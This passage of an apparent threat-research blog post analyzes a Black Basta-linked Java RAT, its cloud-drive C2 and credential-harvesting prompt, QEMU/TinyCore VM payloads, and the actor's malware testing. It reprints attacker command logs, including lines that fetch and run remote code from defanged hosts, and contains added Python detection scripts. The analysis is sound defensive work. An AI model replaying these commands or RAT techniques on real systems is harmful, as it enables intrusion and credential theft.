If the <span data-type='inlineCode'>cf_</span> file (stdin) starts with a specific command string, the content following it will be processed by the malware to execute functionality implemented by the malware developer.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt852690a7e3373f60/684c3afe97300935f06c3c87/blog-code-2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-2.png" asset-alt="blog-code-2.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt852690a7e3373f60/684c3afe97300935f06c3c87/blog-code-2.png" data-sys-asset-uid="blt852690a7e3373f60" data-sys-asset-filename="blog-code-2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-2.png" sys-style-type="display"/><p><em>Figure 13. The logic for the `loginform` command within the if-else command processing chain used by the Java RAT. The malware developer did not update one of the debug statements for Google Drive.</em><br/>Otherwise, the content will be executed as a regular PowerShell command.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted0af96081b9b569/684c3afe851a769e29f6bff0/blog-code-3.png" height="223" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-3.png" asset-alt="blog-code-3.png" inline="true" width="508" max-width="508" max-height="223" style="max-width: 508px; width: 508px; max-height: 223px; height: 223px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted0af96081b9b569/684c3afe851a769e29f6bff0/blog-code-3.png" data-sys-asset-uid="blted0af96081b9b569" data-sys-asset-filename="blog-code-3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-3.png" sys-style-type="display"/><p><em>Figure 14. 
The default case in the if-else chain executes the command string via PowerShell.</em></p><p></p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt07d285d9a2988502/684c3b6efcecfa3c69a2f047/blog-code-4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-4.png" asset-alt="blog-code-4.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt07d285d9a2988502/684c3b6efcecfa3c69a2f047/blog-code-4.png" data-sys-asset-uid="blt07d285d9a2988502" data-sys-asset-filename="blog-code-4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-4.png" sys-style-type="display"/><p><em>Figure 15. The 'execute()' function within the same class executes the command string as a PowerShell command via jPowerShell.</em></p><p></p><table><colgroup data-width='803'><col style="width:39.10336239103363%"/><col style="width:60.89663760896637%"/></colgroup><thead><tr><th><p>Command</p></th><th><p>Function</p></th></tr></thead><tbody><tr><td><p>send</p></td><td><p>Send a file from the operator’s machine to the infected machine.</p></td></tr><tr><td><p>recive</p></td><td><p>Upload a file from the infected machine to the relevant cloud drive. The command string includes a typo made by the developer.</p></td></tr><tr><td><p>extract</p></td><td><p>Extract a specified file archive.</p></td></tr><tr><td><p>loginform</p></td><td><p>Present a fake login prompt to the user. Entered credentials are validated locally, and if correct, are uploaded to the operator’s machine through the cloud drive. 
The username must be specified by the operator.</p></td></tr><tr><td><p>newconfig</p></td><td><p>Replace the existing configuration with one retrieved from Google Sheets.</p></td></tr><tr><td><p>checkconfig</p></td><td><p>Check Google Sheets using the SSID to see if an update is available.</p></td></tr><tr><td><p>startsocks5</p></td><td><p>Initiate a Socks5 proxy tunnel using python.</p></td></tr><tr><td><p>steal</p></td><td><p>Attempt to decrypt and steal stored browser database information. (e.g., credentials)</p></td></tr><tr><td><p>screen</p></td><td><p>Given a supplied URL, download and execute a Java class in memory.</p></td></tr></tbody></table><p>Table 1. Command key for the Java RAT.</p><p>The <a href="https://www.rapid7.com/blog/post/2024/12/04/black-basta-ransomware-campaign-drops-zbot-darkgate-and-custom-malware/">previously seen</a> credential harvesting payload, <span data-type='inlineCode'>identity.jar</span>, has now also been integrated into the Java RAT, and instead of writing the entered credentials to a randomly named file within the working directory, the RAT sends it to the cloud drive C2 file that has been designated to the compromised host. This functionality is executed by the operator by sending the <span data-type='inlineCode'>loginform</span> (the Java class is abbreviated as “Lf”) command to the RAT via the cloud drive file. After decompiling and deobfuscating the Java code that the module consists of, it can be cleaned up, recompiled, and executed as a standalone program. This allows us to see that the appearance of the module to the targeted user is the same, including the fake “Windows Security” title. A review of the code indicates that it has not changed in any other significant way. 
The harvester still forces the active window on top and will not let the user close the window without entering their password or forcibly terminating the process.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6227f96ec6ae7d20/684c3b6e260f53589861451d/blog-code-5.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-5.png" asset-alt="blog-code-5.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6227f96ec6ae7d20/684c3b6e260f53589861451d/blog-code-5.png" data-sys-asset-uid="blt6227f96ec6ae7d20" data-sys-asset-filename="blog-code-5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-5.png" sys-style-type="display"/><em>Figure 16. The credential harvesting window used by the Java RAT.</em><p></p><p>Because the cloud service credentials are stored within the malware payload, and because Google Drive, for example, keeps a revision history for every created file by default, it is possible to view the entire history of commands sent to each infected asset, including stdin and stdout.<br/>This gives a unique in-console view of what the threat actor saw while they were hands-on-keyboard executing commands. Command log snippets can be seen below, with identifying information redacted.
Once access is established, the operator nearly always verifies the user’s name with the <span data-type='inlineCode'>dir</span> command and then uses this information to execute the <span data-type='inlineCode'>loginform</span> command, as the malware does not retrieve the executing user’s name on its own.</p><p><span data-type='inlineCode'>Infected Host GUID: 4C4C4544-0038-4610-8036-B6C04F394733 2025-04-24T16:53:34.038Z: dir c:\users\ 2025-04-24T16:54:47.967Z: loginform &lt;username&gt; 3 2025-04-24T18:40:36.584Z: net time 2025-04-24T18:42:54.426Z: whoami 2025-04-24T18:43:48.284Z: net user &lt;username&gt; /domain 2025-04-24T18:48:35.089Z: hostname 2025-04-24T18:49:57.182Z: net group "Domain Computers" /domain 2025-04-24T18:50:56.578Z: net time 2025-04-24T19:17:14.259Z: ipconfig /all 2025-04-24T19:19:44.442Z: hostname</span></p><p><span data-type='inlineCode'>Infected Host GUID: 594045B3-008B-4106-8FF4-B850DF6C76D0 2025-04-24T17:20:09.896Z: dir c:\users\ 2025-04-24T17:20:58.179Z: loginform &lt;username&gt; 3 2025-04-24T17:36:52.542Z: wmic qfe list brief 2025-04-24T17:40:13.454Z: net time 2025-04-24T17:41:26.860Z: ping -n 2 &lt;domain_controller_hostname&gt; 2025-04-24T17:49:08.598Z: net group "Domain Computers" /domain &gt; c:\users\public\001.txt</span></p><p>In some cases, Rapid7 has observed a command log gap ranging from around 4 to 12 days, beginning after the RAT is successfully executed and the user’s credentials have been stolen. In some cases an SSH tunnel is also established before activity stops. This type of behavior indicates that the threat actor may not be intending to use the access for themselves, but rather sell it to another group that specializes in fully compromising the network towards various ends (e.g., data theft, extortion, ransomware). 
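</p><p>As an added example that is not part of the post, the following Python turns a flattened command log of the kind shown above into per-host, timestamped entries, labels each command as a RAT built-in from Table 1, a discovery command, or other, lists every <span data-type='inlineCode'>loginform</span> use as a confirmed credential-theft lead, and reports idle gaps of four or more days between consecutive commands on a host, the pattern the post associates with access being handed off. The log text is constructed for this example (GUIDs, user names and timestamps are placeholders), and the command grouping is the example's own.</p>

```python
import re
from datetime import datetime, timedelta

# Constructed command log in the flattened shape shown in the post (one line per infected
# host, "timestamp: command" pairs run together). GUIDs, user names and times are placeholders.
SAMPLE_LOG = (
    "Infected Host GUID: 11111111-1111-1111-1111-111111111111 "
    "2025-04-24T16:53:34.038Z: dir c:\\users\\ "
    "2025-04-24T16:54:47.967Z: loginform jdoe 3 "
    "2025-04-24T18:42:54.426Z: whoami "
    "2025-04-24T18:49:57.182Z: net group \"Domain Computers\" /domain "
    "2025-05-03T09:12:00.000Z: hostname\n"
    "Infected Host GUID: 22222222-2222-2222-2222-222222222222 "
    "2025-04-24T17:20:09.896Z: dir c:\\users\\ "
    "2025-04-24T17:20:58.179Z: loginform asmith 3 "
    "2025-04-24T17:36:52.542Z: wmic qfe list brief"
)

HOST_RE = re.compile(r"^Infected Host GUID: (\S+)\s*(.*)$")
TS_RE = re.compile(r"(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{3}Z): ")

# Built-in commands from Table 1 (including the developer's 'recive' typo) versus the
# discovery commands seen in the logs; this grouping is the example's own.
RAT_BUILTINS = {"send", "recive", "extract", "loginform", "newconfig",
                "checkconfig", "startsocks5", "steal", "screen"}
DISCOVERY_PREFIXES = ("whoami", "hostname", "ipconfig", "net user", "net group",
                      "net time", "wmic qfe", "dir c:\\users", "ping ")


def parse_log(text):
    """Return a list of (host_guid, datetime, command) from the flattened per-host lines."""
    entries = []
    for line in text.splitlines():
        m = HOST_RE.match(line.strip())
        if not m:
            continue
        host, body = m.groups()
        parts = TS_RE.split(body)           # ['', ts1, cmd1, ts2, cmd2, ...]
        for ts, cmd in zip(parts[1::2], parts[2::2]):
            when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ")
            entries.append((host, when, cmd.strip()))
    return entries


def classify(cmd):
    low = cmd.lower()
    if low.split(" ", 1)[0] in RAT_BUILTINS:
        return "rat-builtin"
    if any(low.startswith(p) for p in DISCOVERY_PREFIXES):
        return "discovery"
    return "other"


def credential_prompts(entries):
    """Each loginform use pushed the fake Windows Security prompt to the user, so every
    one is a confirmed credential-theft lead for the responder."""
    return [(h, c) for h, _, c in entries if c.lower().startswith("loginform")]


def dwell_gaps(entries, min_days=4):
    """Idle gaps of at least min_days between consecutive commands on one host; the post
    ties 4 to 12 day gaps after credential theft to access being passed to another group."""
    by_host = {}
    for h, t, _ in sorted(entries, key=lambda e: (e[0], e[1])):
        by_host.setdefault(h, []).append(t)
    gaps = []
    for h, times in by_host.items():
        for a, b in zip(times, times[1:]):
            if b - a >= timedelta(days=min_days):
                gaps.append((h, (b - a).days))
    return gaps


def triage(text):
    entries = parse_log(text)
    counts = {}
    for _, _, c in entries:
        label = classify(c)
        counts[label] = counts.get(label, 0) + 1
    return {
        "hosts": sorted({h for h, _, _ in entries}),
        "counts": counts,
        "credential_prompts": credential_prompts(entries),
        "gaps": dwell_gaps(entries),
    }
```

<p>Feeding the revision history of each <span data-type='inlineCode'>cf_</span> file through <span data-type='inlineCode'>triage()</span> gives, per infected host, which accounts were prompted for credentials and how long the access sat idle, which is what drives the reset-and-hunt decisions during response.</p><p>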
Rapid7 has also observed the access being used to test new malware payloads and functionality, rather than to progress the compromise within the targeted networks.</p><h3>Qemu</h3><p>In a smaller volume of incidents handled by Rapid7, operators have been observed sending the user a Google Drive link to download a zip archive containing QEMU (Quick Emulator) and its dependencies, including a custom-made <span data-type='inlineCode'>.qcow2</span> (QEMU Copy-On-Write version 2) virtual disk image. The image contains a Windows 7 Ultimate virtual machine (VM) configured to automatically log on and execute a RunOnce registry key that launches a ScreenConnect installer. In most cases a link to a fake Quick Assist login page (credential harvester) was also delivered to the targeted user by proxy via a self-destructing link service such as <span data-type='inlineCode'>1ty[.]me</span> alongside the Google Drive zip archive link.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdf8087b069488343/684c3aff96cee07264183bc7/blog-code-6.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-6.png" asset-alt="blog-code-6.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdf8087b069488343/684c3aff96cee07264183bc7/blog-code-6.png" data-sys-asset-uid="bltdf8087b069488343" data-sys-asset-filename="blog-code-6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-6.png" sys-style-type="display"/><em>Figure 17. Evidence left in the .qcow2 image, including a ScreenConnect installer, registry command, and QDoor malware.</em><p></p><p>The VM also contains a copy of QDoor, Rust malware that functions as a C2 proxy; once the remote session is established in this way, it allows the threat actors to tunnel C2 traffic through the VM on the infected machine in the target user’s environment.
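</p><p>The QEMU delivery described in this section, as an added detection example that is not part of the post: Python that takes process-creation and network-connection events (constructed here in a Sysmon-like shape; the field names are this example's own) and flags any process that looks like QEMU, by PE OriginalFileName or by a command line naming a <span data-type='inlineCode'>.qcow2</span> disk or a QEMU drive switch, but that no longer carries a qemu file name. It attaches that process's network connections, since, as the post notes, guest traffic appears on the host as connections from the emulator process. That the sensor records a qemu-system OriginalFileName is an assumption, labelled in the code; the command-line rule works without it.</p>

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Subset of a process-creation event in a Sysmon/EDR-like shape; the field names are
    this example's own."""
    pid: int
    image: str
    command_line: str
    original_file_name: str = ""   # PE version-info OriginalFileName, if the sensor records it


@dataclass
class NetworkEvent:
    pid: int
    dest_ip: str
    dest_port: int


# Constructed events: a renamed QEMU started from a user-writable path with a .qcow2 disk
# (svvhost.exe is one of the names the post lists), a legitimate QEMU install, and an
# unrelated service host. IP addresses are from documentation ranges.
SAMPLE_PROCESSES = [
    ProcessEvent(4100, "C:\\Users\\Public\\svvhost.exe",
                 '"C:\\Users\\Public\\svvhost.exe" -m 2048 -hda tc.qcow2 -netdev user,id=n0 -device e1000,netdev=n0',
                 "qemu-system-x86_64.exe"),   # assumed OriginalFileName value
    ProcessEvent(4200, "C:\\Program Files\\qemu\\qemu-system-x86_64.exe",
                 '"C:\\Program Files\\qemu\\qemu-system-x86_64.exe" -m 4096 -drive file=dev.qcow2',
                 "qemu-system-x86_64.exe"),
    ProcessEvent(4300, "C:\\Windows\\System32\\svchost.exe", "svchost.exe -k netsvcs", "svchost.exe"),
]
SAMPLE_NETWORK = [
    NetworkEvent(4100, "203.0.113.10", 443),
    NetworkEvent(4100, "203.0.113.10", 53),
    NetworkEvent(4300, "192.0.2.20", 443),
]

# A .qcow2 disk or a QEMU disk switch on the command line is the telltale; the
# OriginalFileName check is an extra signal where the sensor provides it.
QEMU_ARGS_RE = re.compile(r"\.qcow2\b|(^|\s)-(hda|hdb|drive|cdrom)\b", re.IGNORECASE)
GUEST_NET_RE = re.compile(r"(^|\s)-(netdev|nic|net)\b", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_qemu(p: ProcessEvent) -> bool:
    return (p.original_file_name.lower().startswith("qemu-system")
            or QEMU_ARGS_RE.search(p.command_line) is not None)


def qemu_findings(procs, net_events):
    """Flag QEMU-like processes whose file name no longer says qemu, and attach their
    network connections: the emulator is the host-side source of all guest traffic."""
    conns = {}
    for n in net_events:
        conns.setdefault(n.pid, []).append((n.dest_ip, n.dest_port))
    findings = []
    for p in procs:
        if not is_qemu(p):
            continue
        if basename(p.image).startswith("qemu"):
            continue    # expected file name; whether QEMU is sanctioned at all is a policy question
        findings.append({
            "pid": p.pid,
            "image": p.image,
            "guest_networking": GUEST_NET_RE.search(p.command_line) is not None,
            "connections": conns.get(p.pid, []),
        })
    return findings
```

<p>In the sample, only the renamed emulator is reported, together with its outbound connections on 443 and 53; pairing the finding with the process's parent and the archive it was extracted from is the natural next pivot.</p><p>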
In all cases handled by Rapid7, the QEMU executable was renamed (e.g., <span data-type='inlineCode'>w.exe</span><span data-type='inlineCode'>/</span><span data-type='inlineCode'>svvhost.exe</span>), and, as the emulator of the VM, it is the source on the infected host machine for all network connections resulting from processes running inside the VM. QDoor malware has been attributed to the BlackSuit ransomware group by <a href="https://www.linkedin.com/pulse/qdoor-new-backdoor-tool-blacksuits-arsenal-connectwise-uwvhc">ConnectWise</a>.</p><p>In more recent cases, Rapid7 has observed the BlackSuit affiliates distributing a much smaller (64MB vs. 8.6GB) <span data-type='inlineCode'>.qcow2</span> image that contains TinyCore Linux. When the image is loaded by QEMU, the <span data-type='inlineCode'>bootlocal[.]sh</span> script that is executed upon startup of the TinyCore OS has been set by the threat actors to sleep unless a successful ping is made to one of their servers. Once the ping is successful, an ELF file, <span data-type='inlineCode'>123.out</span> is executed which attempts to connect to a C2 server.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcfd43f41bb848fac/684c3b6e37c391988b22c073/blog-code-7.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-7.png" asset-alt="blog-code-7.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcfd43f41bb848fac/684c3b6e37c391988b22c073/blog-code-7.png" data-sys-asset-uid="bltcfd43f41bb848fac" data-sys-asset-filename="blog-code-7.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-7.png" sys-style-type="display"/><em>Figure 18. 
The contents of `bootlocal[.]sh` within the TinyCore VM.</em><p></p><p>Within the VM image’s command log, .ash_history, a wget command is also present, which indicates the external server from which the <span data-type='inlineCode'>123.out</span> file was originally downloaded to the VM.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt275a4221104818db/684c3b6e44bc4a6d61a88a84/blog-code-8.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-8.png" asset-alt="blog-code-8.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt275a4221104818db/684c3b6e44bc4a6d61a88a84/blog-code-8.png" data-sys-asset-uid="blt275a4221104818db" data-sys-asset-filename="blog-code-8.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-8.png" sys-style-type="display"/><em>Figure 19. Part of the `.ash_history` command log within the TinyCore VM.</em><p></p><p>In an alternate <span data-type='inlineCode'>tc.qcow2</span> payload observed by Rapid7, the TinyCore VM boot script will unconditionally execute two ELF files, <span data-type='inlineCode'>nossl</span> and <span data-type='inlineCode'>ssl</span>. These ELF payloads function as multi-threaded socks proxies, where the <span data-type='inlineCode'>ssl</span> copy uses the OpenSSL library to encrypt traffic and <span data-type='inlineCode'>nossl</span> sends traffic in plaintext.
In both cases, the ELF payloads send registration information to the C2 proxy server on port 53, which is typically used for DNS.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte39a575158a93d48/684c3b6e343886b6d52ceef4/blog-code-9.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-9.png" asset-alt="blog-code-9.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte39a575158a93d48/684c3b6e343886b6d52ceef4/blog-code-9.png" data-sys-asset-uid="blte39a575158a93d48" data-sys-asset-filename="blog-code-9.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-9.png" sys-style-type="display"/><em>Figure 20. The ELF `nossl` begins execution by setting the C2 IPv4 address. Debugging symbols were left inside the file, which shows the original variable names.</em><em></em><em></em><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltaec05873e8fbc459/684c3b62343886b2e12ceeef/blog-code-10.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-10.png" asset-alt="blog-code-10.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltaec05873e8fbc459/684c3b62343886b2e12ceeef/blog-code-10.png" data-sys-asset-uid="bltaec05873e8fbc459" data-sys-asset-filename="blog-code-10.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-10.png" sys-style-type="display"/></p><em>Figure 21. 
The registration string sent by `nossl` to the C2 proxy server from within the TinyCore VM.</em><p></p><p>As shown below from the Black Basta chat leaks, BlackSuit has connections with the group, so the adaptation of their typical spear phishing attacks towards these types of social engineering attacks for initial access is unsurprising.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2fab79b62628bb27/684c41915a6d974b987d1faa/blog-chat-logs-8.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-logs-8.png" asset-alt="blog-chat-logs-8.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2fab79b62628bb27/684c41915a6d974b987d1faa/blog-chat-logs-8.png" data-sys-asset-uid="blt2fab79b62628bb27" data-sys-asset-filename="blog-chat-logs-8.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-logs-8.png" sys-style-type="display"/><em>Figure 22. One of Black Basta’s operators (@tinker) discusses their connection to a member of the BlackSuit ransomware group, with Black Basta’s leader (@usernamegg).</em><p></p><h3>Malware Testing</h3><p>After migrating the Java RAT’s functionality primarily to Google Drive, the threat actor developing the malware also began including the service account they use to test the malware within their own lab environment. The most recent versions of the RAT now also have the command <span data-type='inlineCode'>screen</span> which can download and execute a new Java class in memory. The threat actor first tested this in their own lab before trying it in infected devices that they had gained access to, as seen in the command logs below. Despite the name of the command and the name of the Java class that the test payload has (Screenshot), the payloads have varying functionality, but are generally intended to dynamically add new functionality to the RAT. 
The first test payload observed loads the Java class Screenshot, which then downloads a shellcode blob via a hard coded URL, and injects it into a new <span data-type='inlineCode'>java.exe</span> process using the WINAPI calls <span data-type='inlineCode'>VirtualAllocEx</span>, <span data-type='inlineCode'>WriteProcessMemory</span>, and <span data-type='inlineCode'>CreateRemoteThread</span>.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78a7c69b81333bc1/684c42164d81758611c8eda5/figure-23.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure-23.png" asset-alt="figure-23.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78a7c69b81333bc1/684c42164d81758611c8eda5/figure-23.png" data-sys-asset-uid="blt78a7c69b81333bc1" data-sys-asset-filename="figure-23.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure-23.png" sys-style-type="display"/><em>Figure 23. Injection logic implemented by one version of the dynamically loaded Java Screenshot class.</em><p></p><p>The analyzed test shellcode payload would then perform local PE injection for an embedded Rust PE using NTAPI calls, which for the purposes of the test appears to only spawn a confirmation message box. The Rust PE has an original filename of <span data-type='inlineCode'>testapp.exe</span>, a PDB named <span data-type='inlineCode'>testapp.pdb</span>, and was originally compiled on <span data-type='inlineCode'>2025-04-10T15:45:28Z</span>. 
Notably, the Rust PE did have the Windows Graphics Device Interface (GDI) library and several related function imports as dependencies, which could be used to access or manipulate the screen, but did not appear to be fully implemented yet.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4b4e78736d444da/684c421632b2811674fcaaf9/figure-24.png" height="187" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure-24.png" asset-alt="figure-24.png" inline="true" width="310" max-width="310" max-height="187" style="max-width: 310px; width: 310px; max-height: 187px; height: 187px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4b4e78736d444da/684c421632b2811674fcaaf9/figure-24.png" data-sys-asset-uid="bltc4b4e78736d444da" data-sys-asset-filename="figure-24.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure-24.png" sys-style-type="display"/><em>Figure 24. Test message box spawned by the Rust executable `testapp.exe`.</em><p></p><p>The screen command was then successfully used several times in compromised environments, though for different reasons. In one case the operator simply used it as a way to check the external IP address of the infected host. 
The command log below shows the threat actor testing the <span data-type='inlineCode'>screen</span> command for the first recorded time, using the payload with the embedded Rust PE, within their lab, shortly before starting a new spamming/social engineering attack run (during which they would distribute several copies of the malware).</p><p><span data-type='inlineCode'>Input@2025-04-23T17:12:32.203Z: screen hxxps://tesets[.]live/download/javacode.txt Output@2025-04-23T17-13-02.754Z: start shellcode done</span></p><p>In compromised environments however, the functionality was only observed in use as an external IP checking utility per the following command log.</p><p><span data-type='inlineCode'>Input@2025-05-07T17:36:59.102Z: screen hxxps://andrewjboyd[.]com/file/jc3_old_version.txt Output@2025-05-07T17-37-05.261Z: start shellcode done Input@2025-05-07T17:38:30.923Z: type c:\users\public\info.txt Output@2025-05-07T17-38-40.100Z: &lt;redacted_public_ipv4_address_for_compromised_system&gt;</span></p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfcb410699fdf4d88/684c42164c53c80b77e86eba/figure-25.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure-25.png" asset-alt="figure-25.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfcb410699fdf4d88/684c42164c53c80b77e86eba/figure-25.png" data-sys-asset-uid="bltfcb410699fdf4d88" data-sys-asset-filename="figure-25.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure-25.png" sys-style-type="display"/><em>Figure 25. 
One version of the Java Screenshot class implements functionality to retrieve the infected host’s external IP address and save it to a file named `info.txt`.</em><p></p><p>Rapid7 observed at least one other Rust malware payload, <span data-type='inlineCode'>updater.exe</span>, being used by the threat actor, which appeared to be a custom loader for the SSH utility, containing the PDB name <span data-type='inlineCode'>rust_serverless_killer.pdb</span>. As many of the compromises facilitated by the social engineering attacks have resulted in SSH reverse tunnels being established to provide access, the loader is likely an attempt to evade detections targeting SSH commands by obscuring the related metadata. The SSH executable being loaded has the same functionality, however, and as a result the command-line arguments that must be passed remain the same.</p><p>The threat actor tested a variety of functionality for the Java RAT within their test lab. This includes the zipped python RAT the group would historically upload, decompress and execute (facilitated by the built-in <span data-type='inlineCode'>send</span> and <span data-type='inlineCode'>extract</span> commands), or distribute instead of the Java RAT. The python RAT has a similar command menu to that of the Java RAT.
The python RAT <a href="https://www.gdatasoftware.com/blog/2025/03/38161-analysis-fin7-anubis-backdoor">has also been previously analyzed by Gdata</a>, with similar findings; they refer to it as Anubis (likely based on the source code) and attribute the malware to the FIN7 group.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt434380b373d40331/684c42165bb3f86677a3b346/figure-26.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure-26.png" asset-alt="figure-26.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt434380b373d40331/684c42165bb3f86677a3b346/figure-26.png" data-sys-asset-uid="blt434380b373d40331" data-sys-asset-filename="figure-26.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure-26.png" sys-style-type="display"/><em>Figure 26. The python RAT source labels the decrypted payload as “Anubis”.</em><em></em><em></em><p><span data-type='inlineCode'>InputStart@2025-03-28T13:31:01.430Z: checkconfig InputStart@2025-04-01T15:21:49.251Z: recive c:\programdata\video\log.txt InputStart@2025-04-03T17:01:26.653Z: send C:\Users\Public\Libraries\nature.zip extract C:\Users\Public\Libraries\nature.zip\qwerty dir c:\users\ InputStart@2025-03-28T14:01:17.825Z: checkconfig newconfig InputStart@2025-04-01T13:16:18.589Z: send C:\Users\Public\Libraries\nature.zip startsocks5 C:\Users\Public\Libraries\nature\debug.exe C:\Users\Public\Libraries\nature\test.py</span></p><p><br/>Several commands executed in the threat actor’s test lab can be seen above, where the python-based payload was delivered via the Java RAT.
In several past incidents handled by Rapid7 the name of initial payload archives containing python malware was <span data-type='inlineCode'>Cloud_Email_Switch.zip</span> and the script was named <span data-type='inlineCode'>conf.py</span>, where the script was executed via a copy of <span data-type='inlineCode'>pythonw.exe</span> that had its metadata stripped. The threat actor appears to have now moved to using the Java RAT primarily instead of the python version, although the Java payload retains the functionality to upload, extract, and execute python scripts.</p><table><colgroup data-width='797'><col style="width:31.367628607277293%"/><col style="width:68.63237139272272%"/></colgroup><thead><tr><th><p>Command</p></th><th><p>Function</p></th></tr></thead><tbody><tr><td><p>killexit</p></td><td><p>Immediately terminates the process.</p></td></tr><tr><td><p>ip</p></td><td><p>Creates a UDP socket targeting Google's DNS server (8.8.8[.]8) and connects to it to retrieve the machine’s local IP address.</p></td></tr><tr><td><p>‘cd ‘</p></td><td><p>Change the working directory to one specified by the C2.</p></td></tr><tr><td><p>‘gt ‘</p></td><td><p>Steal a specified file or directory. Reads and sends the content straight to the C2. If the target is a directory, the script will archive it into a zip file first.</p></td></tr><tr><td><p>‘up ‘</p></td><td><p>Upload a file sent by the C2, to the infected host, to a specified file path.</p></td></tr><tr><td><p>env</p></td><td><p>If the C2 specifies a 'list' command, the RAT returns all the existing environmental variables. Otherwise returns a specific variable chosen by the C2.</p></td></tr><tr><td><p>!cf!</p></td><td><p>Create/update a key (named via hard coded string) in the user’s registry using configuration data sent by the C2. 
Allows for the malware’s configuration to be dynamically updated.</p></td></tr><tr><td><p>!tcf!</p></td><td><p>Test C2 addresses supplied by the current C2 in a new config, by creating a TCP socket to attempt to connect to the new address(es) supplied. Returns the result to current C2. Doesn’t update the config.</p></td></tr><tr><td><p>default</p></td><td><p>If one of the above commands is not present, create a child console process (cmd.exe) to execute the contents received from the C2 and return stdout.</p></td></tr></tbody></table><p>Table 2. Command key for the python RAT.</p><p>Among the output of the commands the threat actor ran in their test lab, we can also see a listing of their Downloads directory. The output shows that they have likely been developing Rust malware since at least <span data-type='inlineCode'>2024-09-21</span>. The test lab is most likely also the environment in which they compiled <span data-type='inlineCode'>testapp.exe</span> as Rust executables contain cargo references which include the user’s name, for example: <span data-type='inlineCode'>C:\Users\User\.cargo\registry\src\&lt;truncated&gt;</span>. In contrast, <span data-type='inlineCode'>updater.exe</span>, the Rust SSH loader previously mentioned, references the user <span data-type='inlineCode'>lucak</span>.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd7562ba5aa3bcf55/684c4216973009ed1e6c3d06/figure-27.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure-27.png" asset-alt="figure-27.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd7562ba5aa3bcf55/684c4216973009ed1e6c3d06/figure-27.png" 